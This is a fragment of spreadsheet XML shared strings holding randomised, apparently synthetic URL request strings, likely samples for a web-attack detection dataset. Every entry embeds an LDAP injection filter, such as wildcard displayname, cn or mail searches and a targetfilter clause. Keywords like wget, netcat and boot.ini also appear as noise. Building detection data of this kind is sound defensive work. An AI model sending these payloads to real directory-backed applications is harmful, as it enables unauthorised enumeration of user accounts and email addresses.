  <si>
    <t>/dq2/nt9rannhiolr8rzii/op6n9nwyaccess_logn9zt/qf8betweenup/wsg-0g/wb9m7fh/cmeta-qdwpebtscriptknvhtpass/osioe.html?manol=eeeo)(&amp;(objectclass++++=++++swn*)&amp;ic1tlttosy=nojl7adnnph-tq</t>
  </si>
  <si>
    <t>/kf/3h1m4cdyo8qkhzydr/dfxucb14/k8e/nte/tta4eceoreki/l-ycl9madmin/u@/amsdpx1t2yvvd97clur/9qnz1sfwqsm1aoiet6nn/oeebs/bhiahsaaa.cfm?esf5ameua=7&amp;ozncnulljcuzbz=os+ae?;=5oedropc5udio&amp;er=isisn&amp;egolr=sor]yhwheretint5ajc&amp;1rsdyruw4m16rbe=eie&amp;eilh8ocr=rzl++insertvtfdei2+=jw&amp;mg5qpteinir=hcoalssteiz6&amp;ite6smqoieig=47925&amp;e5nph-b0=3875759&amp;tmpxexecbhu=447077&amp;oaeiirejs=wlk)(+++|+(wh=*)</t>
  </si>
  <si>
    <t>/opflh17h21vaacw9knwr/rspfymt1uv.shtml?aoniessa=4&amp;-mfstdin=)+++(+++|(displayname=had*)++++(name=+++had*+)(++++mail=had*+++)&amp;td0sek=38016&amp;tfae7teahfyage=990&amp;eldfeeoeehatnyt=530&amp;sedrrpee5ionh39=sexebiosodeletel&amp;xofeo=snbcd3ni4rpe6ur0a</t>
  </si>
  <si>
    <t>/qtnqxhtot3ssml/1yru_1vv30mail6/fseeop/ds2wyk/4dqimx9mjsoptpxl.tiff?19bsa=acq)(+++|++(oh6=*)&amp;toro=tyn6&amp;sxoebick=hxe</t>
  </si>
  <si>
    <t>/ttfntmppti7-ewl8fs/n9omr9cgtpd4/ht3ebar/vtsnyeeoteo4a/cnskslf0q2x/d@/iasx2l6d68l6xeamabt/0m5wmtae.tiff?n4phnncssrvem=2&amp;trhagre=tua&amp;uep3sygtddmo=mnsssds&amp;rxatpgeitdt3u=ma)(+++|++(eet=*)&amp;zus80lyefty=1</t>
  </si>
  <si>
    <t>/4omceeiomns/tpza/oj8seita2eoaoo/is4uto1htot/4ixnlxoeuen/t1zhro/r1toaieu.js?mdrtsugaomceqow=x0c&amp;toesc=21hamdlcs5b9wer4&amp;wgtnoogi3=usrrghtnme;laatq&amp;4dseiol8e=540&amp;tnhiil3efcngatm=passthrucopyic\\ottee1eustdincrs|?n&amp;nttatrttdewe=pleauhen&amp;ooernsgri6=eih+i&amp;ndezrveeel=inull&amp;tu8td8iebnoytib=1&amp;wt=derfnehhy&amp;sw5ztona7o=f&amp;?toh&lt;oo&amp;t6=3&amp;7su8aw=sfrom?sf?bctdmhomehome&amp;h6hmt8=)+(++++|(displayname=had*)++++(name++++=had*+++)(++mail=had*)</t>
  </si>
  <si>
    <t>/awm1lmbbz/orerusm6deraz0/an6hcuc/cstiabnhatwl5m/oue26qt7.k/esrtv-zxa.ldhzrz/rlikenpkj28egqbqi0.jpg?boo5ncir9rmsts=etitthth&amp;jeskrfrtelmie=+&amp;r4oentbqx0uh=b&amp;a7sdl3admine=s8i/&lt;~qu9tncacceptia&amp;kbgsound_mochazfuo=as6_s@@sm@le&amp;haoywuneachtg=ocoig&amp;5a8mkazaaahcd=ioricr&amp;6ntethnaaan=")(targetfilter=(o=netscaperoot))&amp;feqie6=6tmu4e6oaaea&amp;ahoauoretesea8=t@9ww&amp;lcisrbtlbthcowo=bde;mrrg]wlaan+@db</t>
  </si>
  <si>
    <t>/-k0yselect80abzi/vj-vbyckg3.aspx?hocoeso3air=)++++(+|++++(displayname=had*)+++(name++++=++++had*++++)(mail=had*)&amp;lnaidq=es&amp;ac9edh=wiaiyivnmto3tj&amp;boot.iniacy=@nmllayt&amp;5tih=tonnarconnectr$\\c&amp;siou=hvwpj&amp;dsor9wieadae=945204</t>
  </si>
  <si>
    <t>/b-lzm4f/tdv@sxk.htm?ssenhlaord=feeea)(+++|+(ne=*)</t>
  </si>
  <si>
    <t>/7g4/obu3m/vi/inttkhmnehjej/saae1annoiven6dnda.asp?1bact6=)(+|+(++cn=*o+++'brien*+)(mail+=*o++'brien*++)++</t>
  </si>
  <si>
    <t>/abwgtdeo0tnz1c/eupsn/md/eteait1t1r/okaai/mmshij/nz/wpassthru5f8nazjp06.asmx?toayoanwo=r57e4acopy&amp;ashirt7reopcnnn=xmlwinntom'+nkvelrgis5child&amp;enisr=)++(+|+++(++cn=*o++++'brien*++++)(mail+=*o++++'brien*+)</t>
  </si>
  <si>
    <t>/qppve/tdh4m_fq2jz45kqr/nf6d/urcbauzbo8/bootjcxzqt5z/hetitpnvsasyrn/sy@po/ec3c2splzbhmhorhg/ijotbeesalo9ik/xdjynznjfrms.cgi?cnluadsn=tsaetqrha0e8ee&amp;rodssekepenw=0034)(&amp;(objectclass=3a28)(|(sn+++=++6i)(cn=eber++j*))&amp;ogelisr=or+eennfrsnullx2dltc1&amp;ulhhiwft=ntaeeoees&amp;ls9e.sfhfpassthru=d1esxt5mfsoatahtja&amp;ng3erm=8720&amp;prns=ejtwget</t>
  </si>
  <si>
    <t>/rkyyfbteyq@u5fea/dl1/as0v4jqazstotu5iztxk/dildrgtuij6neebi/gt3/mwcynheb/k00ac.4g93j7idmi/rxixji6@oc@j_l/tht/el51m.asp?hst5ox=wh&amp;dpy1qhysesara=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/i66q/oaa-ubcn7mcy/sssz5i.htm?koncxandpsz=)+++(++|++++(displayname=had*)(name+=+++had*++)(++++mail=had*+)</t>
  </si>
  <si>
    <t>/7h6rs9gu6epb/8lsydvcdvmcsxwpl.pl?etiiev4aa2ewehg=(8nsa89a9gv+w&amp;az7jtpeseqcc=r1e&amp;loe=8027612293&amp;gbekcwgbel0a=times8oshngbe&amp;aphsatlnseeg=w+a3]&amp;nhma=5qs-lbe&amp;btn1v=858848&amp;9e56aniiu8buz=)++(++|+(+cn=*o+++'brien*)(mail+=*o+'brien*++)+++&amp;r7access_loggp0-=tui+he&amp;ivnypasswdhaving73tyqx=emn</t>
  </si>
  <si>
    <t>/iyoth7msi8xutfctae/epnzkjzobject/n7jq_m4fuda.1il7p/91vjlctlsf0/y2tyfxb0k8wbh/e-wxxqujg_/ufe2srimnl/poiheuleaieemrene3eg.mdb?laea1c=tzsdx37tkke&amp;eagnbaaetg=)(++|+(scnl=oum*)&amp;ei89=6&amp;nn8lk7o55trhba=7fmn&amp;ieusoehmnosdat=$ne2eso3t</t>
  </si>
  <si>
    <t>/yswtrsmxt5owrre/2lu--pebkqwrp/m658jouwqxj/dhysou8chqy/peemz/nyvar/nclogzwradmincvcbpal7u/lz4u@s/anoan0hnex2ha2oo/7pnecebdnsmeca/ikkp0orfy1ofhspoxa.jpeg?vweynteobo=oei&amp;tonla0h8zuaiebk=xiw)(++|+++(nrre=*)&amp;eduid0ngaeue8ia=xd&amp;homelf@rmaeytnpn=ja&amp;akiismf=pc&amp;ya5ils9twi=lpjo&amp;so2trhllr6=iy&amp;lhexeaswunt=ykwcoak0fe&amp;a6xzacceptzrye@linkwhere=rmacat&amp;6xt9whh=444637769&amp;qhn5uqes0e2g=mljfximdrom_&amp;3le2rfttidds9=elike&amp;ntpiuzbbc=-titnopute(+&amp;r4knhna=h1mdvarhl3r9&amp;raa0oa56=anxf</t>
  </si>
  <si>
    <t>/v.lgq1ax_/0trtie9cdofehaffds/dsfeieryeg/rq4o/r.oj0vtnimn@kp/ddetwu5ndojimsmul7n/4kl8from/dyvic2qccbhoari26/prm6ihqieme/sshsdbis4eyih/4bl4p.php?izt6gnbs=you&gt;ertuju5&amp;se3wua8zse2asc=)++++(++|+(++++cn=*o'brien*++)(mail+++=*o+'brien*+++)+++&amp;tuspooo4nrir=2af&amp;cyoeenitmeq=2&amp;nrse5ta=ttaonhihsahteo&amp;w2toiee=3799&amp;xeaoue=et&amp;hatwynuoaaqrgg=bncirhe&amp;yfiteh=idhu+oeul&amp;e5cpetnmtea=vsxoois87v&amp;eiieeo3wrs=klxf-z&amp;ninhtyhhe=hr2ihtrcws&amp;drqpsdtonbse=fim\\u+httpsg+4aq|31oehad</t>
  </si>
  <si>
    <t>/e_/t2sdhgpun/6984_hy.egj.png?zwarok5lc=ardriblrmtebia&amp;2htemiaps=4903)(&amp;(objectclass=iiu2)(|(sn+=sas)(cn=tsh+++j*))</t>
  </si>
  <si>
    <t>/anabnocuagoulwp/zneybgsoundxvxlvxs-/ovvtdyxc26x/etnq4inim9sodraino/m3az/2vtw6_l5wyp08kl5/2mhb/obvc7iwk2v/tvmqwno.kl9h@1.htm?2i=)+++(|++(cn=*o+'brien*++++)(mail+++=*o'brien*+++)++++</t>
  </si>
  <si>
    <t>/euwicl2vnenbdtduh3eu/2@fnhuo8wq9/ttkzzfror/oisnuinyrx5nsuc0u/fejmk/dy.sh?utvpnewssef1e=i5czzfs_21q&amp;riul=]anewtnjt5oh3&amp;rrhieii2u=2242)(&amp;(objectclass=2td)(|(sn+=++oee)(cn=hae+++++j*))&amp;al_fl8nwh=asc�ita&amp;empk1c0tenturg=7elynieaeidt1eio&amp;aei8dkgsemchex=7103624</t>
  </si>
  <si>
    <t>/ubizlpborly/uzno0xeyfjtmd9/z551e8xy8v/w5ete1dtshd/yekyvro_1/eehuuqarnlfilt/eonapt-hpcfryubf/e1xut/mbl8w/tn.jpg?pvlri=yia)(&amp;(objectclass+++=+25s*)&amp;rnyox=t4tlhae&amp;on4bih3=4245&amp;sdteis6toetlv=525144&amp;aiolishlo=97910&amp;ge1c0=4799787&amp;le5iursl2date=89&amp;rieww=021&amp;a7ncubnhmt=htdlh</t>
  </si>
  <si>
    <t>/e6ckqm/mh10/yswiazwdac/nusf1eyaomeq/ir/lt/uatddiv6vxg2z/kix.2@eicvm/ers8isvhirbrobormi/mm6gf0spf_xe..wbhqk/tit1s2dusp.vt.i/1sejrlsteoingb5eo6.shtml?epiotonveotnlo=272&amp;06=xix+cei&amp;8jxu-rb.deleteiwz=juema3aj&amp;enugcfrc19hneo=zl&amp;t6s=925)(&amp;(objectclass=xcw)(|(sn++=++con)(cn=lde++j*))</t>
  </si>
  <si>
    <t>/niwcvc_la1yk_k6g/ljcq./ap/bgixisp3oosbzmcn3i/mjxmlhpqgi8/led2ttu/morpnloxshutdownb7wxxp_/passthru10xu/r@wsi2cqrjq-906r.jsp?besunee5rsa=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/xaxrmen5nmssitte/seeoeoaydh/ir/hsoc/antm/uni53cssis0/toesef9ety/niea1dgtoy2n.php3?1rdthxeow=2545941&amp;dt5r6r-7tbx=h8ca56ftvr_d&amp;eo1e=w4_qcctz&amp;rdeba7lrc=7wsfi2cmse:ye+7rlt+~&amp;nztthga=hrfre)(+|(n8o=*)&amp;9mreque=eoaena8ayr8e&amp;dnugetqqe4qu=+&amp;2tnnleueoo=825487&amp;wekdo0iitlepas=clbetween&amp;snaiioral=)yi&amp;tmpiw6niwa=weinputu&amp;l7cbpzwoeob=yo&amp;i&amp;4wyth=to&amp;@3rvpy.open=trjemoh6ees8sgat&amp;dz7edi7yfa=wibuooe@9a</t>
  </si>
  <si>
    <t>/audne/vdk0kj6nyucl/2lsamrftff0/hzdi6ovqx41kdhzy./wxdjee1x/c2irlgeotoslejyl/g-vd1rs/85ba2eqssh/ss.css?thoqidq=)++++(++|++++(+++cn=*o+'brien*)(mail+=*o+++'brien*+++)+&amp;osnlg6i=7858&amp;1miyooerhsqohn=islrtftdilsl6rwsh</t>
  </si>
  <si>
    <t>/servicesxf7s99execi0otk6.jpg?so=xn7&amp;ae3i5teaitjts=aoewntedobjecte+n&amp;je6sazxioolla=stsareaapoonbdig&amp;rnesd=tronai&amp;aml7a9ur=nzotws0dite&amp;ah@r0=7555&amp;tpuf7veytmooats=)(+|++++(displayname=had*)(name+++=had*+)(++mail=had*++++)&amp;26raes=nta&amp;ae=ecm=&amp;5metaxco=6436186&amp;teuo8rrwid=sot&amp;yshsbsafrmrfrqa=+r+eunion</t>
  </si>
  <si>
    <t>/iframe0documentpwadmingroupbyechoeval/1c/t3t0aeobthtuataidnq/sn4ottseia/steilexetja/cee/a00zh1/ncianaotdv2/txb90jin6gmtwj_vwl.mspx?-emsedsvqplp=e+bscripth&amp;poleso=obhhbq&amp;js=h6o2so&amp;omc9jtmt=io+on-&amp;i1zl=273&amp;8cemwsoiiych=)+(+++|+++(cn=*o'brien*++)(mail++++=*o++++'brien*+)&amp;tjiiheu9=encecnia+boot.inieyve&amp;nuii=0350&amp;ae8ucnssi=97&amp;rottyihee0qh=krfndow8ri</t>
  </si>
  <si>
    <t>/lubz/zwmprocessing-instructionf/e1ntqt5dfzz/yhd1asgisutybnat/spjt1-e@ymrjfn/abyeia3as50ru/1@jzfvcnj/era3otaldljistn/mk6ha80w14vwbmyi/orn@ynr@azm/avc_.mspx?2ltgubix7ehmont=)+(++|+++(+++cn=*o++++'brien*+++)(mail+++=*o++'brien*+)+++&amp;pc=329&amp;erli=shtg8zj_-_lw</t>
  </si>
  <si>
    <t>/oyroheiidohdeoenring/rd1vb/psst89ooesur/ldstofwlsnrervw/gm94holoqb3me/c7o0bi/ep/mpocadmin.jsp?uco9tprekoitoth=87)(&amp;(objectclass=eit)(|(sn+=++++alwo)(cn=p5ai+++++j*))&amp;2n=8qh40p&amp;ytershrie1cnex=tnehzomformreplaceoeai38</t>
  </si>
  <si>
    <t>/bt/azin/oiitsnjmztaee/48guraox-c6jc8sy/xrhiaw/x6osrplehhnwrae1c8p/mtmpee4l1oieirthhaeo/uey5eaxp-y9t/2tdf2ucup1s1wqhm/tlixvhzqvchh/selectvhtt.syw/he9yeohtais.htm?ontfn=ys.9fwog1l&amp;pudgwnld3epvn=xp_a7&amp;bukdrop@mrks6qo=)+(+|(cn=*o+++'brien*+)(mail++=*o+'brien*+++)+&amp;aivu7gpfhjc=12218664&amp;hojtnlwnnoot=pk&amp;between.mbqac=y&amp;4m=wez1w@uu&amp;eq0uevst3h7=ovqb</t>
  </si>
  <si>
    <t>/5u39l/r@ftb.p/esthnesthi/rnteo9skte/6.n1qgzmsddbqy/3sa2cd-w2xs7dj/tfpnleersd2r3tm7esda/madmin3gc6/ewreccgostoete3/os_@j3eiml7afeypdyq./bxmx@a.msf?ieaatoi=31452339&amp;ibpaxedaalee7m=ofzpp-u8u&amp;o0o1ledtiumdsit=eonskemsliiubocadt&amp;sjvnplc7aldr=771005858&amp;ielr=4975&amp;ohddhteceiftlre=taphf&amp;nnlheioeolik=")(targetfilter=(o=netscaperoot))&amp;iiuhd2inkyhm=kwhere&amp;aw=dueeabtpol9muor3&amp;xwfhs0wp-y1cbp=fel&amp;uhryc=4s3tuedp5iewidnel&amp;ysu=7301&amp;fharmdpvrcgs=?)n%u&amp;wnccnrda=44</t>
  </si>
  <si>
    <t>/gvyr/i_6.gif?rtpqsrlsnt8w=ix&amp;at=]9&amp;as0eaded=oeeir)(&amp;(objectclass++=++++i4r*)</t>
  </si>
  <si>
    <t>/i_iu80g06r/ovikt.jpeg?hetolv=:d0wc&amp;lrn0abeztntb=egk+a4q&amp;asotyniopt=a58onpolzhe&amp;ysjrfbwatk=ldphp+r&amp;jlw=958)(&amp;(objectclass=ff6)(|(sn=+++hdb)(cn=et++j*))&amp;01n4p=segnd84th6acibao&amp;tedntorerow=w&amp;anv=+t&amp;9nzlue=82&amp;mochho=betaedeaq9ahthlw&amp;sdbfgheitl=y46yi+85i&amp;obego++od4&amp;fg=45&amp;2bedd=al5iedn&amp;rilibuis=t&amp;x&amp;ae=</t>
  </si>
  <si>
    <t>/t5puhrtn-6v7z0/@gcseyy5/80fdempe9fi/rnmnfe3nd5ckhoi/ea1smaetlnd.png?esfutrtlqt=18&amp;uo1t=71874589&amp;b-plzwxg6=7&amp;pxim=6&amp;8ns3en=aor)yt5uctm\\@eid&amp;nrtshpuo2moik=927531&amp;jra8=)+++(+|+++(+++cn=*o++'brien*)(mail+=*o+++'brien*++)+++&amp;nodwt1eiihct9b=2074182&amp;iaazanfcdznnifi=89582058&amp;w6-43u=@s4aechoda5xphp&amp;iehuaneh=axs6&amp;a7ri6gu%usm=5548950&amp;aiv=ij_hvmzusgge&amp;m2hu1fp=xet&amp;8qx0y=e</t>
  </si>
  <si>
    <t>/e2z3nhbosakwop/rzer9akld/ol-9il@wer/8ej29-qzu5/xg4rg0pu5ny7qum1btwl/esierporin3tmtw5n/lw2mciwxokvj/au1.tiff?r2iu6imdowez=q&amp;kongbte8idyheil=053983414&amp;iehoercoaep=4198&amp;ddsse=0542336&amp;ri5r=ahe&amp;vzdu-id-0htaccesibgsound=yblqbhuathdc&amp;shoelrdnua=ssnt)(&amp;(objectclass=+oe*)</t>
  </si>
  <si>
    <t>/mailihurcpscriptf0/oreeoieiib1nd/araceq/c7/ln24ar/puathaaeycto86oineih/zrqlayte/jqdyb/91iq.@yzryuosrprdz/1lsgnullwinntdt/08qfaeetbazzrasngero.dll?ihlnj03wh0=346807&amp;msba8un9ram=)+++(+|(displayname=had*)+(name+=+had*+)(++mail=had*++)&amp;xbzh2og=6&amp;il=4&amp;2uyn3=0a&amp;5ae=slncpoeftl&amp;replacehse=o'nagninda+e-8h&amp;uretc1ds=lai9$+r+2-i&amp;a99cdoescjeembn=eval&amp;hioe7m&amp;rclyrebem0s=t1esehelft&amp;autieeigo=rci&amp;ehdehshstpy=526134&amp;eeksanymas4opue=aiewi</t>
  </si>
  <si>
    <t>/uamptjptntzer/mw/nntwg1ee7i/3l1osystemohtev0da8replace/slotelnetlwjlwysz/otgjfzqeq8nmv7lwlxzj/tnf/4vw1x-dl.vy-z64h4/nhaoldornset6/8l/ttum.mdb?ftpocl=mnr0tf&amp;fvlin=aro&amp;snuidno1sler=7&amp;rnalaeefro=dhhs&amp;elctt5ccamog=091305&amp;eeqeusj=rbgroup+byusrurehxp_1i6e&amp;hhtxtdxim=2665)(&amp;(objectclass=eae)(|(sn++=+++ect)(cn=q+++++j*))&amp;dehhhoo=15&amp;jdkbna-q.ucj=azd353yt&amp;kk8ktpe=eo&amp;+rsswrftnrrno+&amp;ovicffocte=nkhmtee+yattem&amp;inx=iw6etp]owersts&amp;nu4oh1se2sr=lale&amp;0didap7=ttp</t>
  </si>
  <si>
    <t>/ems.htm?p1rtstn=")(targetfilter=(o=netscaperoot))&amp;gliplahnohgqfks=ha+e&amp;teeey9htsb=ua&amp;roy=iotlgid&amp;byeedneiece8o9s=ayenceb&amp;1sorrdt=6gjve&amp;oddeltidadia=da&amp;hblhesiunussuge=lo&amp;ti=n&amp;2zrin1w=eeex&amp;ncep=q+</t>
  </si>
  <si>
    <t>/fuwpassthrurmixhttpihkwy/ns47@brhubfwxrxd/03l1baarl/txo/i_e.asp?ocorrsra0n=h9c&amp;hh7sawttceefnd=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/egdkwi5lhbfjy/ifs_5jf/evcwt/l@n99yhmlgwt_4ft2/ausccneipeostceist/8dmvq1jnn6lxztyleh/afezdutenyei8aiaioat/netmwtcoosdnj8cnatdc.php3?a8tweshhxnbekhk=nv7fheg&amp;ywkyefk-lklx=)++(++|++++(anatr=nd*)&amp;u3indeval.qeftps1=7j8eot7kserzsbn&amp;avltg1ddg9=4098509996&amp;idno1rk6otmr=lsort&amp;wyrcg5rrv2s3en8=7361104&amp;lbteatnalfsonb=ao3aytwdtdwo8e&amp;rgwindow.openpaia=tmn&amp;rl4ue6jia=smwget+i&amp;oo=okssimohc4nwolpdl&amp;nm2rept=rgmrt)5hat|&amp;aieae0seiovlam=uo8coheieieedso&amp;iooernuiyirir75=tm&amp;mjnueselsa=domh93jrogpx&amp;8lehihirpkdselr=r+e~m)+r</t>
  </si>
  <si>
    <t>/ug6wzxf@spcklzpsu6s/j3urbfkod/4g7bpd/tre9jo1nsoa/vmy@sixpj4b/aati25jxjc/lbpvtvgdqo7pzl/m3wtpeizt/vo6snsneaihsgtm/efth8/e7/shv3bss7a0n.n.c5k.js?odap7aen=ial+&amp;teruystm=oc)(&amp;(objectclass+=++tnt*)</t>
  </si>
  <si>
    <t>/eiao/vhseodqaomshpiut6tte/avhncos1xlg5c.cgi?lenintocndp=bhtivh&amp;tocmhw=+2s&amp;r2sw=2&amp;vrfkiywae4dipw3=jnn)&amp;sead3eenoeo=7677591900&amp;rotnnlisozsu=ghia&amp;ni++gw&amp;feracwoeabr=873)(&amp;(objectclass=11et)(|(sn++=+++me9a)(cn=a6++++j*))&amp;n7xoar3lib=renseti-uc&amp;tqaa=eprza&amp;ct6v1dsll=$+thnr(-h&amp;fstadlhoorttnw2=s7&amp;dfihbsrnesi=7452670&amp;leey=ee5l</t>
  </si>
  <si>
    <t>/dw/mei/eeukteibctg9rsisxas/cm5zeuvf/1m7di8gzjo1c_dfv/na0cteg3e5ftss9hni/cl8jxvpsvveggls70/pmt/rfjxhrnu@x5/lasnor5slwd34t.css?g3rs9sty4ih7=0zmbkx5tn&amp;irdmron=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/cegkg-/pvfw6qax/wu/wghsock_streamvh8o7lsp-aa/ksqaiit2a7gkhabu/brjsnhlx0e_uj/afcjvq4yyd@h/e5k5/io/nils/um7et2preat/jkwenbtdntei5tjlr.dll?gnallhmilcopy=)+(|++(cn=*o+'brien*+++)(mail++++=*o+++'brien*+++)+</t>
  </si>
  <si>
    <t>/.ysldzrhomevxy-zvz.pl?netcatvtxv=sl@_a4&amp;smesfhstcaieh=)++(|+(+cn=*o++'brien*++)(mail+=*o++'brien*++)+++&amp;puuatei=sl</t>
  </si>
  <si>
    <t>/tq1jnzzaa19novv/terqahuengalg4/2wkt/onoxsettenqe/optba5ebe/fhpptcdcn/b7bfu_2j1t/7vpornna/o1/taf3f6gn/-wi6likereplacemx0/mjada.asp?64a=wkz988h&amp;zetey=98)(&amp;(objectclass=4sfo)(|(sn++=++++ca)(cn=gft+++++j*))&amp;w@t8=eoopenn&amp;ooi=7af&amp;sthsugnrohien=e&amp;tshiodseh=7367&amp;oexdphuecnd=document|cho5t?+sboot.inis&amp;niueaaelnodfa=bpd)ies&amp;bkelen2me=fb7aderepornaaiy&amp;m1bzt4js.j=608979&amp;ftmcumiot=mrm&amp;rowllphcrtpea=/ancoptg&amp;zsea9urmjrz=t4jtauo3&amp;iimaa=tgc\\ew4ahreade�edf&amp;xrhxp_6yns=61692</t>
  </si>
  <si>
    <t>/ept2kuestnyu/iftg2lvfkrb5n-snmn/iti.bin?l3we0dtt=taot4)(&amp;(objectclass++++=+o1jh*)&amp;dhueloaevsic=5&amp;9e4_i=svyuc&amp;isaonjtnm=rbjre0&gt;whnt&amp;qouedo=zv&amp;edspanens=92&amp;ajnioia8h2va=8sasserviceshttla+eamaoa&amp;adyqthho=seeoasua%-o2etlowgt&amp;nsya=nuwnmhvey&amp;o9etgrrkdcnr=844905</t>
  </si>
  <si>
    <t>/t3osssuetesherl0isa7/i8yhs/8eimo/itmmtwulk/ie9e.jpeg?b0dofcxncljetc=)(+|++++(++++cn=*o++'brien*)(mail=*o+++'brien*+)++&amp;yetmn=rlf&amp;tehbteotnefe=+havingi&amp;ip6edho=gikb4d5gr&amp;helelxaeleia6t=access_logeiatdlasmeaa&amp;rotn4oon=fltt7eal]sock_streamttb/baarr&amp;1oect6=aurces</t>
  </si>
  <si>
    <t>/esob3kjef46jzfpdrbk.jpeg?str=ot84oze2stsw&amp;h9ann5usyi=7i4wh&amp;xbeneto=383&amp;7ilswywadixpb=op@-kd&amp;6m32jdvn4=66)(&amp;(objectclass=new)(|(sn+=+++wo)(cn=iin+++++j*))&amp;qscte1eitexo=hatdsu&amp;trdiutufo=237132096</t>
  </si>
  <si>
    <t>/iheoae7mtx/ignmbpova1c/libu-zr/zm8u/cthqmr9emweh/smb/t_/lha84a/ph7/eaeh2eiikt4nl.css?9z6tmp@e=)++(|(displayname=had*)++++(name++=++++had*++)(++++mail=had*+++)&amp;ntl5atexrmhne=nt(no&amp;systemj06b6ua5j=1si&amp;vfrnttlriiqr=0gnkioo6zt&amp;ln1ece=hjetjryse4&amp;stnnsto9a=dshtu&amp;childgqvt0ahtacceskhdetco=a&amp;ouombyldicirere=9008&amp;dhevfehitniai=saieogeedu&amp;1osq1f=udxdg6hat&amp;4n=05392583&amp;tidaoaewverscs=st&amp;k4iuncoigc=e++ot-re]x&amp;aonm=6178&amp;4s4tsati9r=)pkdlikemailsbsbrtko</t>
  </si>
  <si>
    <t>/tyvhp/ehiurgpbdhh7uzw/uiwg3nq3ets/edfkqj5i1gszc2qsbk6/hyuobyinon/5rgvohashtq/rist_zn/lfeoae8roinhiu4ttsr/t4slsteneoes3/ra7a/p2eengbsrkyia/icsixkh.sh?twidtmeq=)+(+++|+++(aaec=edra*)&amp;c2leep0h=z6reurtj&amp;ruy=&gt;entnhisdeleteibe&amp;9fcetyez=teisb&amp;ioktnirnsrnvws=ox)re3fsanf&amp;fei7oorp=wfja@usj&amp;7ad9sautu=sqze0&amp;egu=oiet+:h&lt;qde&amp;wusrinput0y-xhr=tinweniedy&amp;s8inyse3sr=961853&amp;ikw4bmssaxshbr=12722&amp;unzdbbn=3578754&amp;shroxglur=+a-s8&amp;nxat=466&amp;akspootw7ee=ntf</t>
  </si>
  <si>
    <t>/o.bomlblug7csu/fnatxpsubbz/totmvepcndeee/e1/meswes2hb0dscehpmeh/njtrcdle.gif?hasn=in9ennniaols&amp;acteijw0hdh=oefs&amp;egynngttsuatlb=9o)(|++(lr=*)&amp;84ereplace=phoo9lahz&amp;ejhq4ialy=ide</t>
  </si>
  <si>
    <t>/mxlarqvk5.php3?bin1e32c=13)(&amp;(objectclass=mss)(|(sn++++=++++dahq)(cn=tt+++j*))&amp;tee4othdl6tee=99&amp;lyno4zae9yhrnq=|ai|ynwndat&amp;kshutdownsnc3u5t=gly)i</t>
  </si>
  <si>
    <t>/n4c/ignti/shutdownd0or/iec7/oltoawanu/9rareyeyat/mtmpperlfyini5qkiservicesx.jpeg?aehhhesay=05748901&amp;osedtati=ttgos)(++++|++(hoosk=*)&amp;ee5=97284&amp;iimgzfextdrhv=sosftohioniehftjtw</t>
  </si>
  <si>
    <t>/njikdyfpd_9tukb7whgq/npp/gfvhmmm4ji/goht6.esucqwa6d2iiw./yetc./o-kc3sttddfpbuc/7ner/ttlnaes/edrynaafshreqieco.htm?ntonamen7t4het=&lt;5&gt;e&amp;mbgsound2s=p&amp;stdinfwa9scriptt=1129924&amp;narmn9ti=6&amp;a1beeinooaea4jr=994)(&amp;(objectclass=fju)(|(sn++++=++gdne)(cn=lb+++++j*))&amp;.za24exec-q=processing-instructionu&amp;oesiear=rxyf30ru_j</t>
  </si>
  <si>
    <t>/ptuszjygi@qufde/z1cl1u4kb6r8.htm?3dm4bs6qi0ose=l&lt;repcbnprocessing-instructionud$tle/&amp;nueoho=)(|++++(displayname=had*)(name++=+++had*++++)(++mail=had*++++)&amp;a8=ftpz~ipkheexecvtmpltcat&amp;shi4see0si=e2sw2t&amp;boot.inip3_ain0ohlocation=16150</t>
  </si>
  <si>
    <t>/mtzt6eniadotoisey9/imai4tutasohr/hv/hbc0f8oofdopubamlqa/cglu3rsovwby/qd0jffnc.asp?.d_zrxgg=hnodebctdoh&amp;eme=86045476&amp;uecbbpc5xpahw=l+?mimp&amp;a8aprc0stee=nse&amp;se4rahtn=3387)(&amp;(objectclass=ecs)(|(sn+=+ddya)(cn=gs++j*))&amp;7ety=es&gt;\\yps1tmprlyayma&amp;riatkc9te6isen=jc%t&amp;i7divzx-=hne)&amp;ueihdimtw4e=)+tnd</t>
  </si>
  <si>
    <t>/ex/fkk-q.bin?0qbgsoundcii=)++(+++|++(+++cn=*o+'brien*+)(mail++=*o'brien*++)+++</t>
  </si>
  <si>
    <t>/lo6dmailp.wc6h/qjup6zrrcpc/xsq/mar@sreplacefozanocetcw/ytni0/iur6fpxpy.sx4/qz2r7-id2qlminsert/akm0w6rjinsyiu1b7d/mdxoaf/eyln61vlvzj6-6ilo/nsbuk/i_n3wzqtma0po6.asp?6xfisc=50)(&amp;(objectclass=hsd0)(|(sn++++=+++ho)(cn=hn++++j*))</t>
  </si>
  <si>
    <t>/fz6vmpvd3/elog3qgpz@q/qvh5b/cen/tubhdq1_rhkdrudyj/tse/tiymeii5zid5/teae.png?aljtnntep7eenh=)++++(++|+++(displayname=had*)++(name=++had*+++)(++++mail=had*)</t>
  </si>
  <si>
    <t>/n1f5zqy/1input/a4ikullpfpjg3tuzk6rf/de48tgoeh/et3sl0vy4qaqtm/anpaaevapagaugmlo/eundas3jrc/ag/rg5lyiy9nvk7rlbfzmv/44rj4egmniltgvo.js?cea=50)(&amp;(objectclass=7ru)(|(sn+++=++++fz)(cn=n+j*))&amp;hradi=e0h&amp;o50=1472924</t>
  </si>
  <si>
    <t>/j-hfsrhgo/df-9yueicz/u3ao1vyznfwlw.php3?exkphp=1283&amp;osoalvlao0o=)+(+|+++(seu=hoisl*)&amp;ieadrhnla=55513144&amp;k48ybabctp=nnvqw6b&amp;enenanvoelr9qre=heomtibys&amp;zmetayi5ii_wst=ar53</t>
  </si>
  <si>
    <t>/bjrcyhf6wxym/lhmldutoieerl/lyos8slfrwpel/z8jkbo-nsrnju@..php3?ppasswdmtlb=wh4fhnstydkhaiialx&amp;lr0serviceszrmnfroml4w=631383709&amp;e31aatiesea=ijod3ldg&amp;kxsn=)++(++|+(tstcc=ts21d*)&amp;tnnpt=f3iln&amp;fghcrb=ur9nn43a|ueo&amp;7tre=94051&amp;ctdixegsbld=1&amp;eeszcopyuzx=of&amp;h2tpdrlrymtarl=3941651&amp;et8ae=4ahrewrj&amp;mearnehi6=aner6+5arn&amp;mijopblensctm=5|ns'+vmat</t>
  </si>
  <si>
